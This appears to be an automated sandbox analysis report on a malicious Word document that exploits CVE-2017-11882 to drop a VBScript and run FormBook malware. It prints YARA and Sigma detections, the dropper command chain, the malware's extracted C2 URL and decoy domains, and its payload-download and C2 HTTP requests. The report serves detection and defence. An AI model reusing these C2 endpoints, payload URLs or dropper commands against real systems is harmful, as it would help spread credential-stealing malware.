11.0.calc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
11.2.calc.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.2.calc.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.2.calc.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a49:$sqlite3step: 68 34 1C 7B E1 0x17b5c:$sqlite3step: 68 34 1C 7B E1 0x17a78:$sqlite3text: 68 38 2A 90 C5 0x17b9d:$sqlite3text: 68 38 2A 90 C5 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
11.0.calc.exe.400000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
11.0.calc.exe.400000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
11.0.calc.exe.400000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18849:$sqlite3step: 68 34 1C 7B E1 0x1895c:$sqlite3step: 68 34 1C 7B E1 0x18878:$sqlite3text: 68 38 2A 90 C5 0x1899d:$sqlite3text: 68 38 2A 90 C5 0x1888b:$sqlite3blob: 68 53 D8 7F 8C 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
11.2.calc.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
Click to see the 8 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 668, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 2996

Sigma detected: Suspicious Script Execution From Temp Folder

Show sources

Source: Process started

Author: Florian Roth, Max Altgelt: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700

Sigma detected: WScript or CScript Dropper

Show sources

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, CommandLine|base64offset|contains: r+, Image: C:\Windows\SysWOW64\cscript.exe, NewProcessName: C:\Windows\SysWOW64\cscript.exe, OriginalFileName: C:\Windows\SysWOW64\cscript.exe, ParentCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2996, ProcessCommandLine: cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C, ProcessId: 2700

Sigma detected: Microsoft Office Product Spawning Windows Shell

Show sources

Source: Process started

Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 668, ProcessCommandLine: CmD.exe /C cscript %tmp%\Client.vbs A C, ProcessId: 2996

Data Obfuscation:

Sigma detected: Office product drops script at suspicious location

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2704, TargetFilename: C:\Users\user\AppData\Local\Temp\Client.vbs

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp

Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen

Found malware configuration

Show sources

Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.cybocross.com/t1st/"], "decoy": ["metaplanck.com", "blackieriver.com", "roswitha-johns.com", "medstarthealth.info", "coin-master.site", "jadeshomes.com", "institutowholelife.com", "cobodoro.com", "redsoxfever.com", "mybestrent.com", "avinashweddingplanner.com", "gzjiakangyy.com", "irectoryofmedicalschools.com", "sidelutagu.biz", "myapoison.com", "356792.com", "waplosik.online", "saverinstitue.com", "derva.link", "dddream-mip.com", "sicilyholidayhouses.com", "nakedpornpics.xyz", "votersfirstmissouri.com", "rebeccadehl.com", "dinaautoricemill.com", "jjzv.quest", "scoutmasterhub.online", "ecommercians.com", "laoniuys151.xyz", "berufsausbilderverband.com", "moonlive.win", "prootro.com", "themetaversebible.com", "huolm.com", "builderindoncaster.com", "getbookedva.com", "freemockup.store", "leeyo.net", "monicas.xyz", "seferihisarveteriner.net", "appsee.net", "truesarang.com", "rosscreekranch.com", "anunturibaneasa.xyz", "yesmeehoo.com", "b2bsaassystems.com", "greatmumbaiescorts.com", "arthropace.com", "francesca-anselmi.com", "seattleselects.com", "fairtravel.online", "chopy.house", "hakaiyue.com", "liberarmoden.com", "sobledis.com", "masononeill.xyz", "metechrobot.com", "cneje0.ltd", "arvoreknowledgelearning.com", "milan-sites.com", "zoedebets.online", "lavyx.com", "answercode.xyz", "foodcartgps.net"]}

Multi AV Scanner detection for submitted file

Show sources

Source: RFQ-CIF DT22.doc	Virustotal: Detection: 25%			Perma Link
Source: RFQ-CIF DT22.doc	ReversingLabs: Detection: 15%

Yara detected FormBook

Show sources

Source: Yara match	File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

Source: 11.0.calc.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.calc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.2.calc.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 11.0.calc.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Exploits:

Found potential equation exploit (CVE-2017-11882)

Show sources

Source:

Static RTF information: Object: 1 Offset: 0001CF7Bh

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

Stream path '_1699974672/\x1CompObj' : ...........................F....Microsoft Equation

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: wntdll.pdb source: calc.exe, calc.exe, 0000000B.00000003.488729930.00000000007C0000.00000004.00000001.sdmp, calc.exe, 0000000B.00000002.542590602.0000000000CB0000.00000040.00000001.sdmp, calc.exe, 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, calc.exe, 0000000B.00000003.487607468.0000000000660000.00000004.00000001.sdmp, cscript.exe
Source:	Binary string: cscript.pdbN source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp
Source:	Binary string: cscript.pdb source: calc.exe, 0000000B.00000002.541582055.0000000000584000.00000004.00000020.sdmp, calc.exe, 0000000B.00000002.541504670.0000000000430000.00000040.00020000.sdmp, cscript.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 13_2_00B8F0D3 GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\Client.vbs

Jump to behavior

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443

Source: global traffic

DNS query: name: google.com

Source: C:\Windows\SysWOW64\cscript.exe

Code function: 4x nop then sub dword ptr [esp+04h], 0Ch

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 162.159.135.233:443

Networking:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 47.241.96.113 80
Source: C:\Windows\explorer.exe	Domain query: www.foodcartgps.net
Source: C:\Windows\explorer.exe	Domain query: www.milan-sites.com

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.cybocross.com/t1st/

Source: Joe Sandbox View

JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Source: global traffic

HTTP traffic detected: GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1Host: www.milan-sites.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: global traffic

HTTP traffic detected: GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233
Source: Joe Sandbox View	IP Address: 162.159.135.233 162.159.135.233

Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://java.sun.com
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.open
Source: WINWORD.EXE, 00000000.00000002.566514221.00000000078AE000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.openformatrg/package/2006/content-t
Source: WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: cscript.exe, 00000006.00000002.414747436.0000000001FB0000.00000002.00020000.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000C.00000000.532738537.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: WINWORD.EXE, 00000000.00000002.561296439.0000000004440000.00000002.00020000.sdmp, explorer.exe, 0000000C.00000000.490593119.0000000001BE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 0000000C.00000000.498844779.0000000002CC7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 0000000C.00000000.501750982.0000000004650000.00000002.00020000.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?ocid=iehp2__
Source: explorer.exe, 0000000C.00000000.530879948.000000000449C000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509117960.000000000449C000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000C.00000000.503719352.00000000083FD000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.531077860.000000000457A000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493099167.000000000457A000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
Source: explorer.exe, 0000000C.00000000.509247877.00000000044E7000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.495179620.0000000008374000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.513635370.0000000008374000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
Source: explorer.exe, 0000000C.00000000.510382629.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 0000000C.00000000.493209706.00000000045D6000.00000004.00000001.sdmp	String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000C.00000000.527766605.0000000000255000.00000004.00000020.sdmp, explorer.exe, 0000000C.00000000.496910219.0000000000255000.00000004.00000020.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3C4C0964-F4E2-47CE-9342-09F02AAEAA3F}.tmp

Jump to behavior

Source: unknown

DNS traffic detected: queries for: google.com

Source: global traffic	HTTP traffic detected: GET /attachments/915347845752705109/915799206072045578/m.jpg HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /t1st/?axoXKTD=uTpqzRmP4oAoFu5bW/C1NBvei3ZEHQ9lndq23HdAXkDs/tJRE4xymzeaNit+87gYgYiprQ==&bx=7nL09FJ HTTP/1.1Host: www.milan-sites.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165

Source: explorer.exe, 0000000C.00000000.498513335.0000000002AE0000.00000002.00020000.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.22:49165 version: TLS 1.2

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Window created: window name: CLIPBRDWNDCLASS

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.504387143.00000000099E9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.487337490.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.687509430.0000000000680000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.514319622.00000000099E9000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Document contains OLE streams which likely are hidden ActiveX objects

Show sources

Source: ~WRF{2A5D8C87-AF4E-46DF-A13D-D1E92A25FFAE}.tmp.0.dr

Stream path '_1699974670/\x1Ole10Native' : .!....Client.vbs.C:\Path\Client.vbs.........C:\Pat

Malicious sample detected (through community Yara rule)

Show sources

Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.calc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.2.calc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 11.0.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.687433526.0000000000650000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.687211832.0000000000070000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.541309604.0000000000140000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.541440559.0000000000380000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.486962418.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
